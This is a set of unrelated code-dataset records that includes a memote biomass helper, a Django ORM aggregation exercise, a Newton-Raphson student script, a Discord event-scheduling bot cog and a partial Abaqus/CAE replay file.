cobra.Model\n The metabolic model under investigation.\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n Returns\n -------\n list\n Metabolites that qualify as direct metabolites i.e. biomass precursors\n that are taken up to be consumed by the biomass reaction only.\n\n \"\"\"\n transport_reactions = set(helpers.find_transport_reactions(model))\n exchange_reactions = set(model.exchanges)\n biomass_reactions = set(helpers.find_biomass_reaction(model))\n\n combined_set = transport_reactions | exchange_reactions | biomass_reactions\n precursors = find_biomass_precursors(reaction)\n\n return [met for met in precursors if met.reactions.issubset(combined_set)]\n","sub_path":"memote/support/biomass.py","file_name":"biomass.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"221100972","text":"import os\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"day66.settings\")\n\n import django\n django.setup()\n\n from applistions.models import MyClass,Student,Teacher,Employee\n from django.db.models import Avg, Sum, Max, Min, Count\n\n # 1.求所有人里面工资最高的\n ret = Employee.objects.all().aggregate(Max('salary'))\n print(ret) # {'salary__max': 80909}\n\n # # 指定返回字典中key的值\n ret = Employee.objects.all().aggregate(max_salary=Max('salary'))\n print(ret) # {'max_salary': 80909}\n\n # # 求所有人的平均价格\n ret = Employee.objects.all().aggregate(Avg('salary'))\n print(ret) # {'salary__avg': 20855.1667}\n\n # 使用ORM查询每个部门的平均工资\n ret = Employee.objects.values('dept').aggregate(Avg('salary'))\n print(ret) # 查询的是每个人的平均工资,此条查询错误\n # annotate中要写上分住之后要做的事情\n # anntate前面查询的是什么就按什么分组\n ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list('dept','salary__avg')\n print(ret) # \n\n # # ORM中分组使用annotate\n # # 1. annotate中要写上分组之后要做的事情\n # # 2. annotate前面查询的是什么就按什么分组\n # ret = Employee.objects.values('dept').annotate(avg_price=Avg('salary')).values('dept', 'avg_price')\n # print(ret)\n #\n # # 每个部门的平均年龄\n ret = Employee.objects.values('dept').annotate(avg_age=Avg('age')).values_list('dept','avg_age')\n print(ret) # \n\n # # 求每个班级的学生的数量\n ret = Student.objects.values('myclass').annotate(s_count=Count('id'))\n print(ret) # \n","sub_path":"day66/ORM聚合和分组.py","file_name":"ORM聚合和分组.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"15301221","text":"#!/usr/bin/env python3\n\"\"\"\nProyecto Algoritmo de Newton-Raphson.\nCada participante debe completar su módulo y luego solicitar el Pull-Request.\n\"\"\"\n\nimport math\n\ndef derivada(f, h = 0.02):\n \"\"\"\n Retorna la función derivada de f dado un h.\n Parámetros:\n f: función de variable real f(x).\n h: tamaño del paso.\n \"\"\"\n\n def _(x):\n return (f(x + h) - f(x))/h\n\n return _\n\ndef err(x,prev):\n\n return math.fabs((x-prev)/x)\n\ndef newton_raphson(f, x, ER, N):\n \"\"\"\n Implementa el Algoritmo de Newton-Raphson y retorna la aproximación de la\n raiz.\n Parámetros:\n f: función de variable real f(x).\n x: aproximación inicial.\n ER: cota mínima del error relativo.\n N: número máximo de iteraciones.\n \"\"\"\n i=1 \n prev=0\n error= ER+1\n dev= derivada(f)\n\n for i in range(N):\n if(error>ER):\n dev=derivada(f)\n prev=x\n x=x-f(x)/dev(x)\n e=err(x,prev)\n print(\"Iteración:\", i, \"Aproximación:\", x, \"Error:\", error)\n return x\n\n\nif __name__ == \"__main__\":\n f= lambda x : math.e**x-2*x**3\n b= lambda x : math.cos(x) + math.exp(-x)\n newton_raphson(f,0.4,0.01,10)\n ","sub_path":"Hector_25967387.py","file_name":"Hector_25967387.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"463274172","text":"from discord.ext import commands\nfrom .utils import checks\nfrom .utils.dataIO import dataIO\nfrom datetime import datetime\nfrom datetime import date\nimport dateutil.parser as dateparser\nimport dateutil\nimport time\nimport asyncio\nimport aiohttp\nimport discord\nimport os\nimport calendar\nimport pytz\n\n\nnumbs = {\n\t\"next\": \"➡\",\n\t\"back\": \"⬅\",\n\t\"exit\": \"❌\"\n}\n\n\nclass EventMaker():\n\t\"\"\"A tool for creating events inside of Discord. Anyone can\n\tcreate an event by default. If a specific role has been\n\tspecified, users must have that role, the server's mod or\n\tadmin role, or be the server owner to create events. Reminders\n\twill be posted to the configured channel (default: the server's\n\tdefault channel), as well as direct messaged to\n\teveryone who has signed up\"\"\"\n\tdef __init__(self, bot):\n\t\tself.bot = bot\n\t\tself.events = dataIO.load_json(\n\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"))\n\t\tself.settings = dataIO.load_json(\n\t\t\tos.path.join(\"data\", \"eventmaker\", \"settings.json\"))\n\n\tasync def event_menu(self, ctx, event_list: list,\n\t\t\t\t\t\t message: discord.Message=None,\n\t\t\t\t\t\t page=0, timeout: int=30):\n\t\t\"\"\"menu control logic for this taken from\n\t\t https://github.com/Lunar-Dust/Dusty-Cogs/blob/master/menu/menu.py\"\"\"\n\t\temb = event_list[page]\n\t\tif not message:\n\t\t\tmessage =\\\n\t\t\t\tawait self.bot.send_message(ctx.message.channel, embed=emb)\n\t\t\tawait self.bot.add_reaction(message, \"⬅\")\n\t\t\tawait self.bot.add_reaction(message, \"❌\")\n\t\t\tawait self.bot.add_reaction(message, \"➡\")\n\t\telse:\n\t\t\tmessage = await self.bot.edit_message(message, embed=emb)\n\t\treact = await self.bot.wait_for_reaction(\n\t\t\tmessage=message, user=ctx.message.author, timeout=timeout,\n\t\t\temoji=[\"➡\", \"⬅\", \"❌\"]\n\t\t)\n\t\tif react is None:\n\t\t\tawait self.bot.remove_reaction(message, \"⬅\", self.bot.user)\n\t\t\tawait self.bot.remove_reaction(message, \"❌\", self.bot.user)\n\t\t\tawait self.bot.remove_reaction(message, \"➡\", self.bot.user)\n\t\t\treturn None\n\t\treacts = {v: k for k, v in numbs.items()}\n\t\treact = reacts[react.reaction.emoji]\n\t\tif react == \"next\":\n\t\t\tnext_page = 0\n\t\t\tif page == len(event_list) - 1:\n\t\t\t\tnext_page = 0 # Loop around to the first item\n\t\t\telse:\n\t\t\t\tnext_page = page + 1\n\t\t\treturn await self.event_menu(ctx, event_list, message=message,\n\t\t\t\t\t\t\t\t\t\t page=next_page, timeout=timeout)\n\t\telif react == \"back\":\n\t\t\tnext_page = 0\n\t\t\tif page == 0:\n\t\t\t\tnext_page = len(event_list) - 1 # Loop around to the last item\n\t\t\telse:\n\t\t\t\tnext_page = page - 1\n\t\t\treturn await self.event_menu(ctx, event_list, message=message,\n\t\t\t\t\t\t\t\t\t\t page=next_page, timeout=timeout)\n\t\telse:\n\t\t\treturn await\\\n\t\t\t\tself.bot.delete_message(message)\n\n\t@commands.command(pass_context=True)\n\tasync def eventcreate(self, ctx):\n\t\t\"\"\"Wizard-style event creation tool. The event will only be created if\n\t\tall information is provided properly\n\t\t\"\"\"\n\t\tauthor = ctx.message.author\n\t\tserver = ctx.message.server\n\t\tallowed_roles = []\n\t\tserver_owner = server.owner\n\t\tif server.id in self.settings:\n\t\t\tif self.settings[server.id][\"role\"] is not None:\n\t\t\t\tspecified_role =\\\n\t\t\t\t\t[r for r in server.roles if r.id == self.settings[server.id][\"role\"]][0]\n\t\t\t\tallowed_roles.append(specified_role)\n\t\t\t\tallowed_roles.append(self.bot.settings.get_server_mod(server))\n\t\t\t\tallowed_roles.append(self.bot.settings.get_server_admin(server))\n\n\t\tif len(allowed_roles) > 0 and author != server_owner:\n\t\t\tfor role in author.roles:\n\t\t\t\tif role in allowed_roles:\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tawait self.bot.say(\"You don't have permission to create events!\")\n\t\t\t\treturn\n\n\t\tcreation_time = datetime.utcnow()\n\t\tawait self.bot.say(\"Enter a name for the event: \")\n\t\tmsg = await self.bot.wait_for_message(author=author, timeout=30)\n\t\tif msg is None:\n\t\t\tawait self.bot.say(\"No name provided!\")\n\t\t\treturn\n\t\tname = msg.content\n\t\tmsg = None\n\t\tawait self.bot.say(\n\t\t\t\"Enter the time the event will start in this format, e.g Fri 08 Jun 2017 19:00 UTC\")\n\t\tmsg = await self.bot.wait_for_message(author=author, timeout=30)\n\t\tif msg is None:\n\t\t\tawait self.bot.say(\"No start time provided!\")\n\t\t\treturn\n\t\tdatetimestring = msg.content\n\t\ttry: \n\t\t\tdt = dateparser.parse(datetimestring)\n\t\t\tstart_time = int(time.mktime(dt.utctimetuple()))\n\t\texcept:\n\t\t\tawait self.bot.say(\"Something went wrong with parsing the time you entered!\")\n\t\t\treturn\n\t\tmsg = None\n\t\tawait self.bot.say(\"Enter the maximum number of participants, 0 for no limit.\")\n\t\tmsg = await self.bot.wait_for_message(author=author, timeout=30)\n\t\tif msg is None:\n\t\t\tawait self.bot.say(\"No number provided!\")\n\t\t\treturn\n\t\telif msg.content == 0:\n\t\t\tmax_parc = 99999999\n\t\telse:\n\t\t\tmax_parc = msg.content\n\t\tmsg = None\n\t\tawait self.bot.say(\"Enter a description for the event: \")\n\t\tmsg = await self.bot.wait_for_message(author=author, timeout=30)\n\t\tif msg is None:\n\t\t\tawait self.bot.say(\"No description provided!\")\n\t\t\treturn\n\t\tif len(msg.content) > 750:\n\t\t\tawait self.bot.say(\"Your description is too long!\")\n\t\t\treturn\n\t\telse:\n\t\t\tdesc = msg.content\n\n\t\tnew_event = {\n\t\t\t\"id\": self.settings[server.id][\"next_id\"],\n\t\t\t\"creator\": author.id,\n\t\t\t\"create_time\": calendar.timegm(creation_time.utctimetuple()),\n\t\t\t\"event_name\": name,\n\t\t\t\"event_start_time\": start_time,\n\t\t\t\"description\": desc,\n\t\t\t\"has_started\": False,\n\t\t\t\"max_participants\" : max_parc,\n\t\t\t\"participants\": [author.id],\n\t\t\t\"reserves\": []\n\t\t}\n\t\tself.settings[server.id][\"next_id\"] += 1\n\t\tself.events[server.id].append(new_event)\n\t\tdataIO.save_json(os.path.join(\n\t\t\t\"data\", \"eventmaker\", \"settings.json\"), self.settings)\n\t\tdataIO.save_json(\n\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"), self.events)\n\t\temb = discord.Embed(title=new_event[\"event_name\"],\n\t\t\t\t\t\t\tdescription=new_event[\"description\"],\n\t\t\t\t\t\t\turl=\"https://time.is/UTC\")\n\t\temb.add_field(name=\"Raid Leader\",\n\t\t\t\t\t value=discord.utils.get(\n\t\t\t\t\t\t self.bot.get_all_members(),\n\t\t\t\t\t\t id=new_event[\"creator\"]))\n\t\temb.add_field(name=\"Event ID\", value=str(new_event[\"id\"]))\n\t\temb.add_field(\n\t\t\tname=\"Start time (UTC)\", value=datetime.utcfromtimestamp(\n\t\t\t\tnew_event[\"event_start_time\"]))\n\t\tchannel = discord.utils.get(self.bot.get_all_channels(),\n\t\t\t\t\t\t\t\tid=self.settings[server.id][\"channel\"])\n\t\teventid = new_event[\"id\"]\n\t\ttry:\n\t\t\tawait self.bot.send_message(channel, \"A new event has been created, type !joinevent {0} to join.\".format(eventid))\n\t\t\tawait self.bot.send_message(channel, embed=emb)\n\t\texcept discord.Forbidden:\n\t\t\tpass # No permissions to send messages\n\n\t@commands.command(pass_context=True)\n\tasync def joinevent(self, ctx, event_id: int):\n\t\t\"\"\"Join the specified event\"\"\"\n\t\tserver = ctx.message.server\n\t\tauthor = ctx.message.author\n\t\tfor event in self.events[server.id]:\n\t\t\tif event[\"id\"] == event_id:\n\t\t\t\tif not event[\"has_started\"]:\n\t\t\t\t\t#print(len(event[\"participants\"]))\n\t\t\t\t\tif len(event[\"participants\"]) < int(event[\"max_participants\"]):\n\t\t\t\t\t\tif ctx.message.author.id not in event[\"participants\"]:\n\t\t\t\t\t\t\tevent[\"participants\"].append(ctx.message.author.id)\n\t\t\t\t\t\t\tawait self.bot.say(\"Joined the event!\")\n\t\t\t\t\t\t\tdataIO.save_json(\n\t\t\t\t\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"),\n\t\t\t\t\t\t\t\tself.events)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tawait self.bot.say(\"You have already joined that event!\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tawait self.bot.say(\"This event already has its max number of participants, do you want to signup as a reserve?\")\n\t\t\t\t\t\tmsg = await self.bot.wait_for_message(author=author, timeout=30)\n\t\t\t\t\t\tresponse = msg.content\n\t\t\t\t\t\tresponse = response.lower()\n\t\t\t\t\t\tif response == \"yes\":\n\t\t\t\t\t\t\tif ctx.message.author.id not in event[\"participants\"]:\n\t\t\t\t\t\t\t\tevent[\"reserves\"].append(ctx.message.author.id)\n\t\t\t\t\t\t\t\tdataIO.save_json(\n\t\t\t\t\t\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"),\n\t\t\t\t\t\t\t\t\tself.events)\n\t\t\t\t\t\t\t\tawait self.bot.say(\"Joined the event!\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tawait self.bot.say(\"You have already joined that event!\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tawait self.bot.say(\"You have not been signed up for this event\")\n\t\t\t\telse:\n\t\t\t\t\tawait self.bot.say(\"That event has already started!\")\n\t\t\t\tbreak\n\t\telse:\n\t\t\tawait self.bot.say(\"It appears as if that event does not exist!\" +\n\t\t\t\t\t\t\t \"Perhaps it was cancelled or never created?\")\n\n\t@commands.command(pass_context=True)\n\tasync def leaveevent(self, ctx, event_id: int):\n\t\t\"\"\"Leave the specified event\"\"\"\n\t\tserver = ctx.message.server\n\t\tauthor = ctx.message.author\n\t\tfor event in self.events[server.id]:\n\t\t\tif event[\"id\"] == event_id:\n\t\t\t\tif not event[\"has_started\"]:\n\t\t\t\t\tif author.id in event[\"participants\"]:\n\t\t\t\t\t\tevent[\"participants\"].remove(author.id)\n\t\t\t\t\t\tawait self.bot.say(\"Removed you from that event!\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tif author.id in event[\"reserves\"]:\n\t\t\t\t\t\t\tevent[\"reserves\"].remove(author.id)\n\t\t\t\t\t\t\tawait self.bot.say(\"Removed you from that event!\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tawait self.bot.say(\"You aren't signed up for that event!\")\n\t\t\t\telse:\n\t\t\t\t\tawait self.bot.say(\"That event already started!\")\n\t\t\t\tbreak\n\n\t@commands.command(pass_context=True)\n\tasync def eventlist(self, ctx, *, timezone: str=\"UTC\"):\n\t\t\"\"\"List events for this server that have not started yet\n\t\tTimezone needs to be something from the third column of\n\t\tthe large table at https://en.wikipedia.org/wiki/List_of_tz_database_time_zones\"\"\"\n\t\tserver = ctx.message.server\n\t\tevents = []\n\t\tfor event in self.events[server.id]:\n\t\t\tif not event[\"has_started\"]:\n\t\t\t\temb = discord.Embed(title=event[\"event_name\"],\n\t\t\t\t\t\t\t\t\tdescription=event[\"description\"],\n\t\t\t\t\t\t\t\t\turl=\"https://time.is/UTC\")\n\t\t\t\temb.add_field(name=\"Organiser\",\n\t\t\t\t\t\t\t value=discord.utils.get(\n\t\t\t\t\t\t\t\t self.bot.get_all_members(),\n\t\t\t\t\t\t\t\t id=event[\"creator\"]))\n\t\t\t\temb.add_field(name=\"Event ID\", value=str(event[\"id\"]))\n\t\t\t\temb.add_field(\n\t\t\t\t\tname=\"Participant count\", value=str(\n\t\t\t\t\t\tlen(event[\"participants\"])))\n\t\t\t\temb.add_field(\n\t\t\t\t\tname=\"Start time (UTC)\", value=datetime.utcfromtimestamp(\n\t\t\t\t\t\tevent[\"event_start_time\"]))\n\t\t\t\tevents.append(emb)\n\t\tif len(events) == 0:\n\t\t\tawait self.bot.say(\"No events available to join!\")\n\t\telse:\n\t\t\tawait self.event_menu(ctx, events, message=None, page=0, timeout=30)\n\n\t@commands.command(pass_context=True)\n\tasync def whojoined(self, ctx, event_id: int):\n\t\t\"\"\"List all participants of the event\"\"\"\n\t\tserver = ctx.message.server\n\t\tfor event in self.events[server.id]:\n\t\t\tif event[\"id\"] == event_id:\n\t\t\t\tif not event[\"has_started\"]:\n\t\t\t\t\tfor user in event[\"participants\"]:\n\t\t\t\t\t\tuser_obj = discord.utils.get(\n\t\t\t\t\t\t\tself.bot.get_all_members(), id=user)\n\t\t\t\t\t\tawait self.bot.say(\"{}#{}\".format(\n\t\t\t\t\t\t\tuser_obj.name, user_obj.discriminator))\n\t\t\t\t\tawait self.bot.say(\"Reserves\")\n\t\t\t\t\tfor user in event[\"reserves\"]:\n\t\t\t\t\t\tuser_obj = discord.utils.get(\n\t\t\t\t\t\t\tself.bot.get_all_members(), id=user)\n\t\t\t\t\t\tawait self.bot.say(\"{}#{}\".format(\n\t\t\t\t\t\t\tuser_obj.name, user_obj.discriminator)) \n\t\t\t\telse:\n\t\t\t\t\tawait self.bot.say(\"That event has already started!\")\n\t\t\t\tbreak\n\n\t@commands.command(pass_context=True)\n\tasync def cancelevent(self, ctx, event_id: int):\n\t\t\"\"\"Cancels the specified event\"\"\"\n\t\tserver = ctx.message.server\n\t\tif event_id < self.settings[server.id][\"next_id\"]:\n\t\t\tto_remove =\\\n\t\t\t\t[event for event in self.events[server.id] if event[\"id\"] == event_id]\n\t\t\tif len(to_remove) == 0:\n\t\t\t\tawait self.bot.say(\"No event to remove!\")\n\t\t\telse:\n\t\t\t\tself.events[server.id].remove(to_remove[0])\n\t\t\t\tdataIO.save_json(\n\t\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"),\n\t\t\t\t\tself.events)\n\t\t\t\tawait self.bot.say(\"Removed the specified event!\")\n\t\telse:\n\t\t\tawait self.bot.say(\"I can't remove an event that \" +\n\t\t\t\t\t\t\t \"hasn't been created yet!\")\n\n\tdef parse_time(self, cur_time, msg: discord.Message):\n\t\t\"\"\"Parse the time\"\"\"\n\t\tstart_time = calendar.timegm(cur_time.utctimetuple())\n\t\tcontent = msg.content\n\t\tpieces = content.split()\n\t\tfor piece in pieces:\n\t\t\tif piece.endswith(\"y\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 31536000 # seconds per year\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telif piece.endswith(\"w\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 604800 # seconds per week\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telif piece.endswith(\"d\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 86400 # seconds per day\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telif piece.endswith(\"h\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 3600 # seconds per hour\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telif piece.endswith(\"m\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 60 # seconds per minute\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telif piece.endswith(\"s\"):\n\t\t\t\ttry:\n\t\t\t\t\tstart_time += int(piece[:-1]) * 1 # seconds per second\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn None # issue with the user's input\n\t\t\telse:\n\t\t\t\treturn None # something went wrong in user's input\n\t\t\treturn start_time\n\n\t@commands.group(pass_context=True)\n\t@checks.admin_or_permissions(manage_server=True)\n\tasync def eventset(self, ctx):\n\t\t\"\"\"Event maker settings\"\"\"\n\t\tif ctx.invoked_subcommand is None:\n\t\t\tawait self.bot.send_cmd_help(ctx)\n\n\t@eventset.command(pass_context=True, name=\"channel\")\n\t@checks.admin_or_permissions(manage_server=True)\n\tasync def eventset_channel(self, ctx, channel: discord.Channel):\n\t\t\"\"\"Set the channel used for displaying reminders. If 'channel'\n\t\tis selected for reminders on event creation, this channel\n\t\twill be used. Default: the server's default channel\"\"\"\n\t\tserver = ctx.message.server\n\t\tself.settings[server.id][\"channel\"] = channel.id\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"),\n\t\t\t\t\t\t self.settings)\n\t\tawait self.bot.say(\"Channel set to {}\".format(channel.mention))\n\n\t@eventset.command(pass_context=True, name=\"role\")\n\t@checks.admin_or_permissions(manage_server=True)\n\tasync def eventset_role(self, ctx, *, role: str=None):\n\t\t\"\"\"Set the role allowed to create events. Default\n\t\tis for everyone to be able to create events\"\"\"\n\t\tserver = ctx.message.server\n\t\tif role is not None:\n\t\t\trole_obj = [r for r in server.roles if r.name == role][0]\n\t\t\tself.settings[server.id][\"role\"] = role_obj.id\n\t\t\tdataIO.save_json(\n\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"settings.json\"),\n\t\t\t\tself.settings)\n\t\t\tawait self.bot.say(\"Role set to {}\".format(role))\n\t\telse:\n\t\t\tself.settings[server.id][\"role\"] = None\n\t\t\tdataIO.save_json(\n\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"settings.json\"),\n\t\t\t\tself.settings)\n\t\t\tawait self.bot.say(\"Role unset!\")\n\n\tasync def check_events(self):\n\t\t\"\"\"Event loop\"\"\"\n\t\tCHECK_DELAY = 60\n\t\twhile self == self.bot.get_cog(\"EventMaker\"):\n\t\t\tcur_time = datetime.utcnow()\n\t\t\tcur_time = calendar.timegm(cur_time.utctimetuple())\n\t\t\tsave = False\n\t\t\tfor server in list(self.events.keys()):\n\t\t\t\tchannel = discord.utils.get(self.bot.get_all_channels(),\n\t\t\t\t\t\t\t\t\t\t\tid=self.settings[server][\"channel\"])\n\t\t\t\tfor event in self.events[server]:\n\t\t\t\t\tif cur_time >= event[\"event_start_time\"]\\\n\t\t\t\t\t\t\tand not event[\"has_started\"]:\n\t\t\t\t\t\temb = discord.Embed(title=event[\"event_name\"],\n\t\t\t\t\t\t\t\t\t\t\tdescription=event[\"description\"])\n\t\t\t\t\t\temb.add_field(name=\"Created by\",\n\t\t\t\t\t\t\t\t\t value=discord.utils.get(\n\t\t\t\t\t\t\t\t\t\t self.bot.get_all_members(),\n\t\t\t\t\t\t\t\t\t\t id=event[\"creator\"]))\n\t\t\t\t\t\temb.add_field(name=\"Event ID\", value=str(event[\"id\"]))\n\t\t\t\t\t\temb.add_field(\n\t\t\t\t\t\t\tname=\"Participant count\", value=str(\n\t\t\t\t\t\t\t\tlen(event[\"participants\"])))\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tawait self.bot.send_message(channel, embed=emb)\n\t\t\t\t\t\texcept discord.Forbidden:\n\t\t\t\t\t\t\tpass # No permissions to send messages\n\t\t\t\t\t\tfor user in event[\"participants\"]:\n\t\t\t\t\t\t\ttarget = discord.utils.get(\n\t\t\t\t\t\t\t\tself.bot.get_all_members(), id=user)\n\t\t\t\t\t\t\tawait self.bot.send_message(target, embed=emb)\n\t\t\t\t\t\tevent[\"has_started\"] = True\n\t\t\t\t\t\tsave = True\n\t\t\tif save:\n\t\t\t\tdataIO.save_json(\n\t\t\t\t\tos.path.join(\"data\", \"eventmaker\", \"events.json\"),\n\t\t\t\t\tself.events)\n\t\t\tawait asyncio.sleep(CHECK_DELAY)\n\n\tasync def server_join(self, server):\n\t\tif server.id not in self.settings:\n\t\t\tself.settings[server.id] = {\n\t\t\t\t\"role\": None,\n\t\t\t\t\"next_id\": 1,\n\t\t\t\t\"channel\": server.id\n\t\t\t}\n\t\tif server.id not in self.events:\n\t\t\tself.events[server.id] = []\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"events.json\"), self.events)\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"), self.settings)\n\n\tasync def server_leave(self, server):\n\t\t\"\"\"Cleanup after leaving server\"\"\"\n\t\tif server.id in self.events:\n\t\t\tself.events.pop(server.id)\n\t\tif server.id in self.settings:\n\t\t\tself.settings.pop(server.id)\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"events.json\"), self.events)\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"), self.settings)\n\n\tasync def confirm_server_setup(self):\n\t\t\"\"\"Ensures that all servers the bot is in\n\t\thave default settings for them. Runs only\n\t\ton cog load\"\"\"\n\t\tfor server in list(self.bot.servers):\n\t\t\tif server.id not in self.settings:\n\t\t\t\tself.settings[server.id] = {\n\t\t\t\t\t\"role\": None,\n\t\t\t\t\t\"next_id\": 1,\n\t\t\t\t\t\"channel\": server.id\n\t\t\t\t}\n\t\t\t\tif server.id not in self.events:\n\t\t\t\t\tself.events[server.id] = []\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"events.json\"), self.events)\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"), self.settings)\n\n\ndef check_folder():\n\tif not os.path.isdir(os.path.join(\"data\", \"eventmaker\")):\n\t\tprint(\"Creating the eventmaker directory in data\")\n\t\tos.mkdir(os.path.join(\"data\", \"eventmaker\"))\n\n\ndef check_file():\n\tif not dataIO.is_valid_json(os.path.join(\"data\", \"eventmaker\", \"events.json\")):\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"events.json\"), {})\n\tif not dataIO.is_valid_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\")):\n\t\tdataIO.save_json(os.path.join(\"data\", \"eventmaker\", \"settings.json\"), {})\n\n\ndef setup(bot):\n\tcheck_folder()\n\tcheck_file()\n\tn = EventMaker(bot)\n\tloop = asyncio.get_event_loop()\n\tloop.create_task(n.check_events())\n\tloop.create_task(n.confirm_server_setup())\n\tbot.add_listener(n.server_join, \"on_server_join\")\n\tbot.add_listener(n.server_leave, \"on_server_remove\")\n\tbot.add_cog(n)\n","sub_path":"eventmaker/eventmaker.py","file_name":"eventmaker.py","file_ext":"py","file_size_in_byte":17880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"494956103","text":"# -*- coding: mbcs -*-\n#\n# Abaqus/CAE Release 6.12-1 replay file\n# Internal Version: 2012_03_13-20.44.39 119612\n# Run by Anzong on Sun Jan 18 10:13:01 2015\n#\n\n# from driverUtils import executeOnCaeGraphicsStartup\n# executeOnCaeGraphicsStartup()\n#: Executing \"onCaeGraphicsStartup()\" in the site directory ...\nfrom abaqus import *\nfrom abaqusConstants import *\nsession.Viewport(name='Viewport: 1', origin=(0.0, 0.0), width=189.999997615814, \n height=126.824998408556)\nsession.viewports['Viewport: 1'].makeCurrent()\nsession.viewports['Viewport: 1'].maximize()\nfrom caeModules import *\nfrom driverUtils import executeOnCaeStartup\nexecuteOnCaeStartup()\nopenMdb('test.cae')\n#: The model database \"C:\\Users\\Anzong\\Desktop\\test.cae\" has been opened.\nsession.viewports['Viewport: 1'].setValues(displayedObject=None)\nsession.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(\n referenceRepresentation=ON)\np = mdb.models['Model-1'].parts['Frame']\nsession.viewports['Viewport: 1'].setValues(displayedObject=p)\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=ON, \n engineeringFeatures=ON)\nsession.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(\n referenceRepresentation=OFF)\nmdb.models['Model-1'].Material(name='Steel')\nmdb.models['Model-1'].materials['Steel'].Elastic(table=((200000000000.0, 0.3), \n ))\nmdb.models['Model-1'].TrussSection(name='FrameSection', material='Steel', \n area=1.96349540849362e-05)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\np = mdb.models['Model-1'].parts['Frame']\ne = p.edges\nedges = e.getSequenceFromMask(mask=('[#7f ]', ), )\nregion = p.Set(edges=edges, name='Set-1')\np = mdb.models['Model-1'].parts['Frame']\np.SectionAssignment(region=region, sectionName='FrameSection', offset=0.0, \n offsetType=MIDDLE_SURFACE, offsetField='', \n thicknessAssignment=FROM_SECTION)\na = mdb.models['Model-1'].rootAssembly\nsession.viewports['Viewport: 1'].setValues(displayedObject=a)\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(\n adaptiveMeshConstraints=ON, optimizationTasks=OFF, \n geometricRestrictions=OFF, stopConditions=OFF)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\nmdb.models['Model-1'].StaticLinearPerturbationStep(name='Apply load', \n previous='Initial', description='10 kN central load')\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(step='Apply load')\nsession.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=ON, bcs=ON, \n predefinedFields=ON, connectors=ON, adaptiveMeshConstraints=OFF)\nsession.viewports['Viewport: 1'].view.setValues(nearPlane=3.50669, \n farPlane=5.49331, width=2.90668, height=1.43737, viewOffsetX=-0.0428107, \n viewOffsetY=0.00856215)\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=OFF, \n engineeringFeatures=OFF)\nsession.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(\n referenceRepresentation=ON)\np1 = mdb.models['Model-1'].parts['Frame']\nsession.viewports['Viewport: 1'].setValues(displayedObject=p1)\na = mdb.models['Model-1'].rootAssembly\nsession.viewports['Viewport: 1'].setValues(displayedObject=a)\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\n#: The contents of viewport \"Viewport: 1\" have been copied to the clipboard.\nsession.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=ON, \n 